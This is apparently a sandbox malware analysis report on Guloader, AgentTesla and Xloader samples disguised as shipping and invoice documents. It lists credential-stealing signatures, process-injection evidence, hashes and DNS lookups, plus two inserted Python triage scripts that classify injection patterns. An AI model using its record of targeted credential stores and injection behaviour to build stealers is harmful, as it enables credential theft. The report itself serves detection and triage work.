memory/1172-6-0x00000000006A0000-0x00000000007A0000-memory.dmp

memory/1172-5-0x00000000006A0000-0x00000000007A0000-memory.dmp

memory/1172-3-0x00000000006A0000-0x00000000007A0000-memory.dmp

memory/1172-14-0x00000000006A0000-0x00000000007A0000-memory.dmp

memory/1172-15-0x000000007337D000-0x0000000073388000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win10v2004-20241007-en

Max time kernel

152s

Max time network

157s

Command Line

"C:\Users\Admin\AppData\Local\Temp\New Order 00027748585 02222022.exe"

Signatures

Guloader family

guloader

Guloader,Cloudeye

downloader guloader

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\New Order 00027748585 02222022.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\New Order 00027748585 02222022.exe

"C:\Users\Admin\AppData\Local\Temp\New Order 00027748585 02222022.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 102.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 17.14.97.104.in-addr.arpa udp
US 8.8.8.8:53 249.194.19.2.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\nsgA26B.tmp\Math.dll

MD5 85428cf1f140e5023f4c9d179b704702
SHA1 1b51213ddbaedfffb7e7f098f172f1d4e5c9efba
SHA256 8d9a23dd2004b68c0d2e64e6c6ad330d0c648bffe2b9f619a1e9760ef978207a
SHA512 dfe7f9f3030485caf30ec631424120030c3985df778993342a371bf1724fa84aa885b4e466c6f6b356d99cc24e564b9c702c7bcdd33052172e0794c2fdecce59

C:\Users\Admin\AppData\Local\Temp\nsgA26B.tmp\System.dll

MD5 cff85c549d536f651d4fb8387f1976f2
SHA1 d41ce3a5ff609df9cf5c7e207d3b59bf8a48530e
SHA256 8dc562cda7217a3a52db898243de3e2ed68b80e62ddcb8619545ed0b4e7f65a8
SHA512 531d6328daf3b86d85556016d299798fa06fefc81604185108a342d000e203094c8c12226a12bd6e1f89b0db501fb66f827b610d460b933bd4ab936ac2fd8a88

memory/2720-15-0x0000000003490000-0x0000000003590000-memory.dmp

memory/2720-16-0x0000000003490000-0x0000000003590000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win7-20241010-en

Max time kernel

120s

Max time network

127s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2860 -s 224

Network

N/A

Files

N/A

Analysis: behavioral21

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win10v2004-20241007-en

Max time kernel

93s

Max time network

158s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Windows.System.Diagnostics.TraceReporting.PlatformDiagnosticActions.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2444 wrote to memory of 2808 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2444 wrote to memory of 2808 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2444 wrote to memory of 2808 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Windows.System.Diagnostics.TraceReporting.PlatformDiagnosticActions.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Windows.System.Diagnostics.TraceReporting.PlatformDiagnosticActions.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win10v2004-20241007-en

Max time kernel

140s

Max time network

148s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe"

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Agenttesla family

agenttesla

AgentTesla payload

Description Indicator Process Target
N/A N/A N/A N/A

Reads WinSCP keys stored on the system

spyware stealer

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 5068 set thread context of 3864 N/A C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe N/A

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe

"C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe"

C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe

"C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 100.208.201.84.in-addr.arpa udp

Files

memory/5068-0-0x000000007466E000-0x000000007466F000-memory.dmp

memory/5068-1-0x00000000002D0000-0x00000000003A2000-memory.dmp

memory/5068-2-0x0000000074660000-0x0000000074E10000-memory.dmp

memory/5068-3-0x0000000004DE0000-0x0000000004DEE000-memory.dmp

memory/5068-4-0x0000000004F40000-0x0000000004FD2000-memory.dmp

memory/5068-5-0x000000007466E000-0x000000007466F000-memory.dmp

memory/5068-6-0x0000000074660000-0x0000000074E10000-memory.dmp

memory/5068-7-0x0000000005280000-0x000000000531C000-memory.dmp

memory/5068-8-0x0000000005650000-0x000000000570C000-memory.dmp

memory/5068-9-0x0000000005710000-0x000000000574C000-memory.dmp

memory/3864-10-0x0000000000400000-0x000000000043C000-memory.dmp

memory/3864-13-0x0000000074660000-0x0000000074E10000-memory.dmp

memory/5068-14-0x0000000074660000-0x0000000074E10000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Consignment Document.pdf.exe.log

MD5 e50d61d6d5cec0d2c6b3fbf02b17af2d
SHA1 fcf43f96e7389c27ee201fb00b65db01ca2cee40
SHA256 a87cf2dbf70a59d3d347f9ca743b6ceb3c805b4714cf4fb963c18b9ca8ffd0a9
SHA512 0348b60095cd48d275a5234fe34c1fd7a7c9921e1d92dafea0379d607f898eb1c2e089dafa1db608fad65497fc8f90fa699109b06a5f2c12c0bc8c9192ff9924

memory/3864-15-0x0000000005CA0000-0x0000000006244000-memory.dmp

memory/3864-16-0x0000000074660000-0x0000000074E10000-memory.dmp

memory/3864-17-0x0000000005940000-0x0000000005958000-memory.dmp

memory/3864-18-0x0000000006500000-0x0000000006566000-memory.dmp

memory/3864-19-0x0000000074660000-0x0000000074E10000-memory.dmp

memory/3864-20-0x0000000074660000-0x0000000074E10000-memory.dmp

memory/3864-21-0x0000000006C00000-0x0000000006C50000-memory.dmp

memory/3864-22-0x0000000006BE0000-0x0000000006BEA000-memory.dmp

memory/3864-23-0x0000000074660000-0x0000000074E10000-memory.dmp

memory/3864-24-0x0000000074660000-0x0000000074E10000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win7-20241010-en

Max time kernel

139s

Max time network

19s

Command Line

"C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe"

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Agenttesla family

agenttesla

AgentTesla payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Reads WinSCP keys stored on the system

spyware stealer

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2600 set thread context of 2716 N/A C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2600 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe
PID 2600 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe
PID 2600 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe
PID 2600 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe
PID 2600 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe
PID 2600 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe
PID 2600 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe
PID 2600 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe
PID 2600 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe
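
The SetThreadContext and WriteProcessMemory rows above, together with the matching rows in behavioral6 (PID 5068 into 3864), behavioral18 (PID 4544 into 1420) and behavioral28 (PID 1292 into 2736 and 3008, PID 1200 into 2656), are the raw evidence of process injection in this report; the sandbox lists them without saying which pattern they form. The script below is an added triage example, not part of the sandbox output or of any of the malware families' own code. It parses indicator rows copied from those tables (a subset of the repeated WriteProcessMemory rows), groups them per writer/target pair and applies this example's own labels: a process that writes into and sets the thread context of a fresh copy of itself is the RunPE / process-hollowing pattern; a 64-bit rundll32.exe writing into SysWOW64\rundll32.exe is the expected relaunch for a 32-bit DLL and carries little signal on its own; Explorer writing into another process deserves a look.

```python
"""Triage WriteProcessMemory / SetThreadContext indicator rows from a sandbox report.

Added example, not part of the original report. The sample rows are copied
from the signature tables of behavioral6, behavioral7, behavioral18 and
behavioral28 (only two of the nine repeated write rows for 2600->2716 are
kept); the verdict labels are this example's own, not a sandbox verdict.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

# One row per line, exactly as the report prints them:
#   "PID <src> wrote to memory of <dst> N/A <src image> <dst image>"
#   "PID <src> set thread context of <dst> N/A <src image> <dst image>"
SAMPLE_ROWS = r"""
PID 5068 set thread context of 3864 N/A C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe
PID 2600 set thread context of 2716 N/A C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe
PID 2600 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe
PID 2600 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe
PID 4544 wrote to memory of 1420 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1292 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe C:\Windows\SysWOW64\schtasks.exe
PID 1292 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe
PID 1200 wrote to memory of 2656 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\NAPSTAT.EXE
"""

# Image paths contain spaces, so the two paths are split on the first
# " <drive>:\" that follows the source path rather than on whitespace.
ROW_RE = re.compile(
    r"^PID (?P<src>\d+) (?P<op>wrote to memory of|set thread context of) (?P<dst>\d+) "
    r"N/A (?P<src_img>[A-Za-z]:\\.+?) (?P<dst_img>[A-Za-z]:\\.+)$"
)


@dataclass
class Edge:
    src_pid: int
    dst_pid: int
    src_image: str
    dst_image: str
    writes: int = 0          # number of WriteProcessMemory rows seen
    set_context: bool = False  # at least one SetThreadContext row seen
    verdict: str = ""


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def parse_rows(text: str) -> Dict[Tuple[int, int], Edge]:
    """Collapse repeated rows into one Edge per (writer PID, target PID)."""
    edges: Dict[Tuple[int, int], Edge] = {}
    for line in text.strip().splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            raise ValueError(f"unrecognised indicator row: {line!r}")
        key = (int(m["src"]), int(m["dst"]))
        edge = edges.setdefault(key, Edge(key[0], key[1], m["src_img"], m["dst_img"]))
        if m["op"].startswith("wrote"):
            edge.writes += 1
        else:
            edge.set_context = True
    return edges


def classify(edge: Edge) -> str:
    """Heuristic labels for one writer/target pair (this example's own rules)."""
    same_image = edge.src_image.lower() == edge.dst_image.lower()
    if same_image and edge.set_context:
        return "HOLLOWING"        # new copy of itself + SetThreadContext: RunPE pattern
    if same_image:
        return "SELF_WRITE"       # writes into a copy of itself, no context switch seen
    if basename(edge.src_image) == basename(edge.dst_image):
        return "WOW64_RELAUNCH"   # e.g. system32\rundll32.exe -> SysWOW64\rundll32.exe
    if basename(edge.src_image) == "explorer.exe":
        return "EXPLORER_SOURCE"  # Explorer writing into another process: review
    return "CROSS_IMAGE"          # writes into a different binary it launched


def triage(text: str) -> Dict[Tuple[int, int], Edge]:
    edges = parse_rows(text)
    for edge in edges.values():
        edge.verdict = classify(edge)
    return edges


def summary(text: str) -> List[str]:
    """One human-readable line per edge, sorted by (writer, target) PID."""
    return [
        f"{e.verdict:15} {s}->{d}  {basename(e.src_image)} -> {basename(e.dst_image)}"
        f"  writes={e.writes} set_context={e.set_context}"
        for (s, d), e in sorted(triage(text).items())
    ]


if __name__ == "__main__":
    print("\n".join(summary(SAMPLE_ROWS)))
```

On the rows from this report the script yields HOLLOWING for both AgentTesla samples (behavioral6 lists only the SetThreadContext call, behavioral7 lists the writes as well), WOW64_RELAUNCH for the rundll32 loads of the NSIS plug-in DLLs, CROSS_IMAGE for the Xloader dropper writing into the schtasks.exe it spawned, and EXPLORER_SOURCE for behavioral28, where the injected Explorer.EXE writes into NAPSTAT.EXE, which then acquires SeDebugPrivilege. The rule set is deliberately small; a production pipeline would join in the parent command line and the target's image-load events before assigning a verdict.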

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe

"C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe"

C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe

"C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe"

Network

N/A

Files

memory/2600-0-0x00000000749FE000-0x00000000749FF000-memory.dmp

memory/2600-1-0x0000000000070000-0x000000000015E000-memory.dmp

memory/2600-2-0x00000000749F0000-0x00000000750DE000-memory.dmp

memory/2600-3-0x0000000000350000-0x0000000000360000-memory.dmp

memory/2600-4-0x00000000749FE000-0x00000000749FF000-memory.dmp

memory/2600-5-0x00000000749F0000-0x00000000750DE000-memory.dmp

memory/2600-6-0x0000000006050000-0x000000000611C000-memory.dmp

memory/2600-7-0x0000000000840000-0x000000000088E000-memory.dmp

memory/2716-9-0x0000000000400000-0x000000000043C000-memory.dmp

memory/2716-17-0x0000000000400000-0x000000000043C000-memory.dmp

memory/2716-15-0x0000000000400000-0x000000000043C000-memory.dmp

memory/2716-13-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2716-12-0x0000000000400000-0x000000000043C000-memory.dmp

memory/2716-11-0x0000000000400000-0x000000000043C000-memory.dmp

memory/2716-20-0x00000000749F0000-0x00000000750DE000-memory.dmp

memory/2716-10-0x0000000000400000-0x000000000043C000-memory.dmp

memory/2716-19-0x0000000000400000-0x000000000043C000-memory.dmp

memory/2600-21-0x00000000749F0000-0x00000000750DE000-memory.dmp

memory/2716-22-0x00000000749F0000-0x00000000750DE000-memory.dmp

memory/2716-23-0x00000000749F0000-0x00000000750DE000-memory.dmp

memory/2716-24-0x00000000749F0000-0x00000000750DE000-memory.dmp

memory/2716-25-0x00000000749F0000-0x00000000750DE000-memory.dmp

memory/2716-26-0x00000000749F0000-0x00000000750DE000-memory.dmp
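
The memory dump names above encode PID, capture sequence number and the start and end address of the region. Read as a flat list they hide two facts a triager wants: which regions exist only in the injected child (PID 2716) and never in the parent (PID 2600), and that the child-only range 0x400000-0x43C000 is the same range the sandbox dumped repeatedly from PID 3864 in behavioral6, the other AgentTesla detonation. The script below is an added example, not part of the report; it parses an excerpt of the dump names from behavioral6 and behavioral7 (constructed from the listings on this page), counts captures per region and reports child-only and shared regions. The image-base-like tag for ranges starting at 0x400000 is this example's heuristic; whether the region holds a PE image can only be confirmed by opening the dump.

```python
"""Summarise sandbox memory-dump names of the form
memory/<pid>-<seq>-0x<start>-0x<end>-memory.dmp.

Added example, not part of the original report. SAMPLE_DUMPS is an excerpt
constructed from the behavioral6 (PIDs 5068/3864) and behavioral7
(PIDs 2600/2716) file listings of this report.
"""
import re
from collections import Counter, defaultdict
from typing import Dict, Iterable, List, NamedTuple, Set, Tuple

DUMP_RE = re.compile(
    r"^memory/(?P<pid>\d+)-(?P<seq>\d+)-0x(?P<start>[0-9A-Fa-f]+)-0x(?P<end>[0-9A-Fa-f]+)-memory\.dmp$"
)

Region = Tuple[int, int]  # (start, end), end exclusive


class Dump(NamedTuple):
    pid: int
    seq: int
    start: int
    end: int


SAMPLE_DUMPS = """
memory/5068-1-0x00000000002D0000-0x00000000003A2000-memory.dmp
memory/3864-10-0x0000000000400000-0x000000000043C000-memory.dmp
memory/3864-15-0x0000000005CA0000-0x0000000006244000-memory.dmp
memory/2600-1-0x0000000000070000-0x000000000015E000-memory.dmp
memory/2600-2-0x00000000749F0000-0x00000000750DE000-memory.dmp
memory/2716-9-0x0000000000400000-0x000000000043C000-memory.dmp
memory/2716-10-0x0000000000400000-0x000000000043C000-memory.dmp
memory/2716-11-0x0000000000400000-0x000000000043C000-memory.dmp
memory/2716-12-0x0000000000400000-0x000000000043C000-memory.dmp
memory/2716-13-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2716-15-0x0000000000400000-0x000000000043C000-memory.dmp
memory/2716-17-0x0000000000400000-0x000000000043C000-memory.dmp
memory/2716-19-0x0000000000400000-0x000000000043C000-memory.dmp
memory/2716-20-0x00000000749F0000-0x00000000750DE000-memory.dmp
"""


def parse_dumps(text: str) -> List[Dump]:
    """Turn whitespace-separated dump names into Dump records."""
    dumps = []
    for name in text.split():
        m = DUMP_RE.match(name)
        if not m:
            raise ValueError(f"not a memory dump name: {name!r}")
        dumps.append(Dump(int(m["pid"]), int(m["seq"]), int(m["start"], 16), int(m["end"], 16)))
    return dumps


def regions_by_pid(dumps: Iterable[Dump]) -> Dict[int, Counter]:
    """pid -> Counter{(start, end): number of times that region was dumped}."""
    out: Dict[int, Counter] = defaultdict(Counter)
    for d in dumps:
        out[d.pid][(d.start, d.end)] += 1
    return out


def child_only_regions(regions: Dict[int, Counter], parent: int, child: int) -> Set[Region]:
    """Regions dumped from the child that never appear in the parent."""
    return set(regions[child]) - set(regions[parent])


def shared_regions(regions: Dict[int, Counter], *pids: int) -> Set[Region]:
    """Regions dumped from every one of the given PIDs."""
    common = None
    for pid in pids:
        rs = set(regions[pid])
        common = rs if common is None else common & rs
    return common or set()


def region_size(region: Region) -> int:
    start, end = region
    return end - start


def describe(text: str, parent: int, child: int) -> List[str]:
    """Human-readable lines for the child-only regions of one injection pair."""
    regions = regions_by_pid(parse_dumps(text))
    lines = []
    for region in sorted(child_only_regions(regions, parent, child)):
        start, end = region
        tag = " (image-base-like range, absent from the parent)" if start == 0x400000 else ""
        lines.append(
            f"pid {child}: 0x{start:X}-0x{end:X} {region_size(region)} bytes, "
            f"captured {regions[child][region]}x{tag}"
        )
    return lines


if __name__ == "__main__":
    print("\n".join(describe(SAMPLE_DUMPS, 2600, 2716)))
    regs = regions_by_pid(parse_dumps(SAMPLE_DUMPS))
    for start, end in sorted(shared_regions(regs, 3864, 2716)):
        print(f"region 0x{start:X}-0x{end:X} dumped from both AgentTesla children")
```

The repeated captures of one small region in the child, with the parent showing only the loader image and the .NET runtime range, is the shape to expect when a .NET dropper (the CLR_v4.0_32 UsageLogs entry in behavioral6 confirms a 32-bit .NET 4 process) unpacks a native payload into a suspended copy of itself. The shared 0x3C000-byte region across both detonations is a hint, not proof, that the two lures carry the same inner payload; comparing the two dumps is the next step.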

Analysis: behavioral28

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win7-20240903-en

Max time kernel

149s

Max time network

123s

Command Line

C:\Windows\Explorer.EXE

Signatures

Xloader

loader xloader

Xloader family

xloader

Xloader payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
